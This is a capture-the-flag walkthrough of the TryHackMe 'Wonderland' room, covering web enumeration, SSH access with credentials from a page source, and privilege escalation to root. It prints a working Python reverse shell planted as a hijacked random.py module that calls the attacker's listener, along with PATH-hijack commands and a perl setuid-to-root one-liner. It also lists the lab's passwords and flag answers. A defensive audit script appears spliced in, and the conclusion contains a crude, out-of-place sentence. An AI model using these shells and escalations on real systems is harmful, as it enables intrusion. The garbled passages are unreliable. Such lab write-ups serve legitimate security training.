In this walkthrough we will be going through Wonderland from TryHackMe. This room is rated Medium on the platform, and the objective is to grab two flags from the machine by showcasing skills in enumeration, exploitation, and horizontal and vertical privilege escalation. So, let's get started without any delay.
Machine Info:

| Title | Wonderland |
|---|---|
| IP address | 10.10.15.200 |
| Difficulty | Medium |
| Objective | Enter Wonderland and capture the flags. |
Enumeration:
- Checked whether the machine is live.
- I performed an Nmap scan and found ports 22 and 80 open.
sudo nmap -sS -sV 10.10.15.200
- Next, I started enumerating port 80, which was running a Golang web server.
- Fired up gobuster to reveal hidden directories and found one: /r
wh1terose@fsociety:~$ gobuster dir -u http://10.10.15.200/ -w ~/Desktop/Wordlist/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.15.200/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/03/17 20:15:31 Starting gobuster in directory enumeration mode
===============================================================
/img                  (Status: 301) [Size: 0] [--> img/]
/index.html           (Status: 301) [Size: 0] [--> ./]
/r                    (Status: 301) [Size: 0] [--> r
- Navigating to /r, we got the message "Keep Going". I fired up gobuster again on this URL.
wh1terose@fsociety:~$ gobuster dir -u http://10.10.15.200/r/ -w ~/Desktop/Wordlist/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.15.200/r/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/03/17 20:17:56 Starting gobuster in directory enumeration mode
===============================================================
/a                    (Status: 301) [Size: 0] [--> a/]
/index.html           (Status: 301) [Size: 0] [--> ./]
===============================================================
2023/03/17 20:19:40 Finished
===============================================================
wh1terose@fsociety:~$ gobuster dir -u http://10.10.15.200/r/a/ -w ~/Desktop/Wordlist/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.15.200/r/a/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/03/17 20:19:49 Starting gobuster in directory enumeration mode
===============================================================
/b                    (Status: 301) [Size: 0] [--> b/]
/index.html           (Status: 301) [Size: 0] [--> ./]
===============================================================
2023/03/17 20:21:29 Finished
===============================================================
- It seems we are spelling out the word "Rabbit" one directory at a time.
- Finally completed it: http://10.10.15.200/r/a/b/b/i/t/
- Checking the page source (Ctrl+U) revealed a potential username and password pair: alice:HowDothTheLittleCrocodileImproveHisShiningTail
Initial Access:
- Used the credentials to log into the machine via SSH.
- Everything is upside down: the user flag is in the root directory.
- Next we checked which elevated commands we can run with sudo -l. Nothing for our own user, but we found that walrus_and_the_carpenter.py can be run as the user rabbit.
- Checking the contents of walrus_and_the_carpenter.py, we found that it imports the random module.
Privilege Escalation:
- I came across the module-path hijacking issue in Python: the interpreter searches the script's own directory before the standard library, so with write permission on that directory a file named random.py is imported instead of the real module. So next we create random.py, which will run our code and give us a shell as that user.
import os
import pty
import socket

lhost = "10.18.11.103"
lport = 4444

# Leftover stubs from a zipfile-hijack template; nothing in the
# walrus_and_the_carpenter.py script uses them, but they are harmless.
ZIP_DEFLATED = 0

class ZipFile:
    def close(*args):
        return
    def write(*args):
        return
    def __init__(self, *args):
        return

# Connect back to the listener and attach stdin/stdout/stderr to the socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((lhost, lport))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
os.putenv("HISTFILE", '/dev/null')
pty.spawn("/bin/bash")
s.close()
sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
- Inspecting the strings in the teaParty binary, we found that it calls the date binary by its bare name, which we can exploit via PATH manipulation.
- I tried to create a file named "date" that spawns a shell, but I was unable to do so with either nano or vim. So I created the file on my local machine and transferred it with wget.
chmod +x date
echo $PATH
export PATH=/home/rabbit:$PATH
echo $PATH
./teaParty
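Both escalation steps above rely on the same weakness: a privileged program resolves a name (the random module, the date binary) through a search path the low-privileged user controls. As an added defensive check, not part of the original walkthrough, the Python below audits exactly that: stdlib module names shadowed by a file earlier on the search path, and PATH entries the current user can write to. The random.py scenario is constructed in a temporary directory; the module names and paths are otherwise taken from this box.

```python
"""Audit search-path hijacking exposure (added example, not from the room)."""
import os
import sysconfig
import tempfile

STDLIB_DIR = sysconfig.get_paths()["stdlib"]


def writable_dirs(search_path):
    """Return the entries of a PATH-like list that the caller can write to.
    An empty entry means the current directory and is resolved as such."""
    hits = []
    for entry in search_path:
        resolved = os.path.abspath(entry or ".")
        if os.path.isdir(resolved) and os.access(resolved, os.W_OK):
            hits.append(entry)
    return hits


def shadowed_modules(search_path, names, stdlib_dir=STDLIB_DIR):
    """Map each stdlib module name in `names` to the first directory on
    search_path, ahead of the stdlib, holding `<name>.py` or a regular
    package `<name>/__init__.py`. Such an entry wins over the real module."""
    found = {}
    for directory in search_path:
        if os.path.abspath(directory) == os.path.abspath(stdlib_dir):
            break  # entries after the stdlib cannot shadow it
        for name in names:
            candidate = os.path.join(directory, name)
            if name not in found and (
                os.path.isfile(candidate + ".py")
                or os.path.isfile(os.path.join(candidate, "__init__.py"))
            ):
                found[name] = directory
    return found


def demo():
    """Constructed scenario: a writable script directory containing random.py
    that sys.path lists before the stdlib, as when sudo runs
    /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py.
    Running with `python3 -I` keeps the script directory off sys.path."""
    with tempfile.TemporaryDirectory() as script_dir:
        with open(os.path.join(script_dir, "random.py"), "w") as fh:
            fh.write("# constructed stand-in for a shadowing module\n")
        search_path = [script_dir, STDLIB_DIR]
        return (shadowed_modules(search_path, ["random", "os"]),
                writable_dirs(search_path))
```

For the date case the same writable_dirs check applied to the PATH teaParty inherits flags the writable /home/rabbit entry; the fix on the defending side is for setuid helpers to call binaries by absolute path or reset PATH before executing anything.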
- Next we found a password.txt file in the hatter user's home directory with a password inside. I downloaded linpeas to the machine to enumerate privesc vectors, but it got stuck in the date section. So I tried the new password to SSH in as hatter and succeeded. Meanwhile I re-spawned the rabbit shell and deleted the date file we made earlier to avoid the conflict while running linpeas.
- hatter SSH password: WhyIsARavenLikeAWritingDesk?
- In the linpeas results we find that a capability is set on a perl binary. We can use it as a backdoor to escalate our privileges by changing the process UID.
cp $(which perl) .
/usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
- With this, we successfully rooted the box and got our root flag as a sign of victory.
Task 1 – Capture the flags
Question 1 – Obtain the flag in user.txt
thm{"Curiouser and curiouser!"}
Question 2 – Escalate your privileges, what is the flag in root.txt?
thm{Twinkle, twinkle, little bat! How I wonder what you’re at!}
Conclusion:
So that was "Wonderland" for you. We started off with a regular nmap scan and found two ports open: 80 (HTTP) and 22 (SSH). Next, we performed directory bruteforcing with gobuster and found the directory pattern r/a/b/b/i/t. Moving on, we found alice's credentials in the page source and got our initial access via SSH. Once inside, we got the user flag in the root directory. In alice's home directory we found a Python script using the random module and used module-path hijacking to get a shell as the user rabbit. Then we performed PATH manipulation on the date binary to get access as the user hatter. We found hatter's SSH password in his home directory and used it to log into his account. At last, we used linpeas to find potential privesc vectors and found that perl had a capability set. With the help of that, we escalated our privileges to root and got the root flag in the root directory alongside the tampon of Lord Putin. On that note, I will take your leave and meet you in the next one. Till then, "Happy hacking".